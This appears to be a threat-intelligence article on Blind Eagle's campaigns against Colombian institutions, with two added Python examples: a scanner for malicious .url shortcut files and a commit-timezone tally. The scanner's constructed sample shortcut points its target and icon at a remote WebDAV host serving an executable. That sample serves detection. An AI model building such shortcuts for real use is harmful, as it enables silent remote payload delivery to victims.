In a significant development in the cybersecurity landscape, APT-C-36, more commonly known as Blind Eagle, has intensified its operations targeting Colombian governmental, financial, and critical infrastructure organizations.
Active since 2018, this Advanced Persistent Threat group has recently expanded its arsenal with sophisticated exploit techniques and malware, demonstrating an alarming ability to adapt to evolving security measures.
The threat actor has infected more than 1,600 victims in a single campaign, highlighting the scale and effectiveness of its operations.
Blind Eagle has demonstrated remarkable agility in incorporating new exploits into its attack methods.
On November 12, 2024, Microsoft patched a newly discovered vulnerability, CVE-2024-43451, which was being actively exploited in the wild using malicious .url files.
Within just six days of the patch release, Blind Eagle had already integrated a variant of this exploit into its attack arsenal.
This variant differs from the original exploit in that it does not expose the NTLMv2 hash but instead serves as a notification mechanism for the threat actors when a targeted user downloads the malicious file.
The group's ability to rapidly adapt to newly disclosed vulnerabilities underscores its technical sophistication and persistent threat capabilities.
The malicious .url files are particularly effective because they can trigger WebDAV requests on unpatched machines through unusual user interactions such as right-clicking, deleting, or dragging the file.
Even on patched systems, these files can still lead to malware infection if a user manually clicks on them.
Despite being in use for over two months, many of these .url files remain undetected by antivirus engines on VirusTotal, allowing Blind Eagle to maintain stealth in its operations.
The group's tactics now include leveraging legitimate file-sharing platforms like Google Drive, Dropbox, GitHub, and Bitbucket to distribute its malware, further complicating detection efforts by security tools.
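The article does not publish the contents of the .url files, so the following is an added defensive example of my own, not code from the article or from Check Point Research. It relies only on the documented Internet Shortcut format (an INI file with an [InternetShortcut] section carrying URL= and IconFile= keys) and flags shortcut files whose target or icon is fetched from a remote host, which is the property that lets a .url file reach out over SMB or WebDAV before or without the user opening the linked page. The three sample files are constructed for the example, and the flagging rules are my own heuristics rather than Microsoft's patch logic.

```python
import configparser
import re
from typing import Dict, List

# Internet Shortcut (.url) files are INI-formatted with an [InternetShortcut]
# section. These heuristics (my own, not from the article) flag targets that
# reach out to a remote host: UNC paths, file:// URLs with a host part,
# remote icon files, and the host@port form that Windows resolves via WebDAV.
UNC_RE = re.compile(r"^\\\\[^\\?.]")                       # \\host\share, not \\?\ or \\.\ device paths
FILE_HOST_RE = re.compile(r"^file://(?!/)[^/\\]+", re.I)   # file://host/... but not file:///C:/...
HTTP_RE = re.compile(r"^https?://", re.I)
WEBDAV_PORT_RE = re.compile(r"^(?:\\\\|file://)[^\\/@]+@(?:\d{1,5}|ssl)(?=[\\/]|$)", re.I)

# Constructed sample inputs (not real samples from the campaign): two benign
# shortcuts and one whose target and icon both live on a remote host.
SAMPLES: Dict[str, str] = {
    "benign_web.url": (
        "[InternetShortcut]\n"
        "URL=https://www.example.com/\n"
    ),
    "benign_local_icon.url": (
        "[InternetShortcut]\n"
        "URL=https://intranet.example/\n"
        "IconFile=C:\\Windows\\System32\\SHELL32.dll\n"
        "IconIndex=13\n"
    ),
    "suspicious_remote.url": (
        "[InternetShortcut]\n"
        "URL=file://203.0.113.10@80/share/update.exe\n"
        "IconFile=\\\\203.0.113.10@80\\share\\icon.ico\n"
        "IconIndex=1\n"
    ),
}


def references_remote_share(value: str) -> bool:
    """True for UNC paths and file:// URLs that name a remote host."""
    return bool(UNC_RE.match(value) or FILE_HOST_RE.match(value))


def scan_url_file(text: str) -> List[str]:
    """Return human-readable findings for the contents of one .url file."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error as exc:
        return [f"unparseable .url content ({type(exc).__name__})"]
    if not parser.has_section("InternetShortcut"):
        return ["missing [InternetShortcut] section"]
    section = parser["InternetShortcut"]
    url = section.get("URL", "").strip()
    icon = section.get("IconFile", "").strip()

    findings: List[str] = []
    if references_remote_share(url):
        findings.append(f"URL target is a remote share: {url}")
    if references_remote_share(icon) or HTTP_RE.match(icon):
        findings.append(f"IconFile is fetched from a remote location: {icon}")
    for field, value in (("URL", url), ("IconFile", icon)):
        if WEBDAV_PORT_RE.match(value):
            findings.append(f"{field} uses the host@port form that Windows resolves over WebDAV")
    return findings


def scan_all(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a mapping of filename -> contents and keep only files with findings."""
    results = {name: scan_url_file(text) for name, text in files.items()}
    return {name: hits for name, hits in results.items() if hits}


if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(name)
        for hit in hits:
            print("  -", hit)
```

In a mail gateway or endpoint sweep the same function would be fed the bytes of every attached or downloaded .url file; a remote IconFile is worth alerting on even where the URL itself looks ordinary, because Explorer renders the icon without the user opening the shortcut.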
Campaign Infrastructure and Sophisticated Malware Chain
Between December 2024 and February 2025, Blind Eagle conducted multiple campaigns identified by internal codenames such as “socialismo,” “miami,” “PARAISO,” “marte,” and “saturno”.
These campaigns used a consistent attack chain: malicious .url files delivered via email (often through compromised Google Drive accounts) would download HeartCrypt-packed malware.
This malware would then extract and inject a packed .NET loader into legitimate Windows processes like csc.exe, ultimately delivering a .NET Remote Access Trojan (RAT) that appears to be a variant of PureCrypter.
The technical sophistication continues throughout the attack chain. The .NET RAT collects detailed information about the victim's system, including username, operating system version, installed antivirus, and machine specifications.
This data is then encrypted using AES and sent to command and control (C&C) servers whose domains change frequently but often resolve to the same IP addresses.
In response, the C&C server provides a URL for downloading the final payload, typically Remcos RAT, which is hosted on GitHub or Bitbucket repositories maintained by the attackers.
Analysis of the GitHub repository “Oscarito20222/file” revealed that all repository updates were committed in the UTC-5 timezone, potentially indicating Blind Eagle's origin in South American countries.
This repository was regularly updated with new malicious executables, which were then deleted after use, demonstrating the group's operational security awareness.
Notably, on February 25, 2025, the group accidentally uploaded an HTML file containing personally identifiable information (PII) from previous phishing activities, revealing its targeting of Colombian bank customers and confirming the focus on Colombian victims.
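The timezone observation above is the kind of claim an analyst can reproduce from commit metadata. The following is an added example of my own, not Check Point's tooling and not data from the “Oscarito20222/file” repository: it takes commit author dates in ISO 8601 form (as produced by `git log --format=%aI` in a clone of the repository under study) and tallies the UTC offsets and local working hours. The five timestamps are constructed for the example.

```python
from collections import Counter
from datetime import datetime
from typing import Iterable, Tuple

# Constructed sample of commit author dates with UTC offsets (not taken from
# the article or from the repository it names). Real input would come from
# `git log --format=%aI`, one ISO 8601 timestamp per commit.
SAMPLE_COMMIT_DATES = [
    "2025-01-10T09:12:44-05:00",
    "2025-01-11T14:03:10-05:00",
    "2025-01-12T18:45:01-05:00",
    "2025-02-02T08:30:00-05:00",
    "2025-02-25T22:10:37-05:00",
]


def _parse(raw: str) -> datetime:
    """Parse one timestamp and insist that it carries a UTC offset."""
    dt = datetime.fromisoformat(raw)
    if dt.utcoffset() is None:
        raise ValueError(f"timestamp carries no UTC offset: {raw}")
    return dt


def utc_offset_histogram(dates: Iterable[str]) -> Counter:
    """Count commits per UTC offset, labelled like 'UTC-5' or 'UTC+5.5'."""
    counts: Counter = Counter()
    for raw in dates:
        hours = _parse(raw).utcoffset().total_seconds() / 3600
        counts[f"UTC{hours:+g}"] += 1
    return counts


def dominant_offset(dates: Iterable[str]) -> Tuple[str, float]:
    """Most common offset and the fraction of commits that carry it."""
    counts = utc_offset_histogram(dates)
    if not counts:
        raise ValueError("no commit dates supplied")
    label, n = counts.most_common(1)[0]
    return label, n / sum(counts.values())


def local_hour_profile(dates: Iterable[str]) -> Counter:
    """Hour of day in the committer's own local time, i.e. the working-hours pattern."""
    return Counter(_parse(raw).hour for raw in dates)


if __name__ == "__main__":
    print(utc_offset_histogram(SAMPLE_COMMIT_DATES))
    print(dominant_offset(SAMPLE_COMMIT_DATES))
    print(sorted(local_hour_profile(SAMPLE_COMMIT_DATES).items()))
```

Author timestamps are set by the committer's own machine and configuration and can be altered at will, so a uniform offset is a corroborating signal to be weighed alongside other evidence (language of lure documents, victimology, infrastructure registration times), not an attribution on its own.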
Severe Impact on Colombian Public and Private Sectors
The impact of Blind Eagle's campaigns has been substantial, particularly on Colombian governmental organizations.
Based on the filenames of malicious .url files, the group has been specifically targeting various Colombian justice system entities, including courts handling criminal cases, labor disputes, and protective measures.
The malicious filenames mimic official legal communications, such as notifications of hearings, judicial complaints, and protective orders, exploiting trust in governmental communications to increase the likelihood of victim interaction.
In the December 2024 “PARAISO” campaign alone, more than 1,600 Colombian systems were infected with Remcos RAT.
Figure: the “facturacioncol/truth” Bitbucket repository.
Considering the targeted nature of APT groups like Blind Eagle, this infection rate is particularly significant and demonstrates their effectiveness.
Total infections across the campaigns that took place over just one week in December approximated 9,000, revealing the extensive reach of the group's operations.
A data leak from the group's operations exposed over 8,400 entries of personally identifiable information collected through phishing campaigns impersonating Colombian banks.
Of the 1,634 identified email addresses, five belonged to Colombian government agencies, including the national police, tax authority, and comptroller's office.
This indicates Blind Eagle's persistent targeting of governmental entities alongside financial institutions and private citizens, creating a comprehensive threat to Colombia's national security and economic stability.
Check Point Research, which has been tracking Blind Eagle's activities, notes that the group remains one of the most active and dangerous threat actors in Latin America.
Its rapid evolution, effective social engineering tactics, and focus on both public and private sector entities require organizations to implement proactive threat intelligence, advanced security defenses, and continuous monitoring to mitigate the risk posed by this adaptable adversary.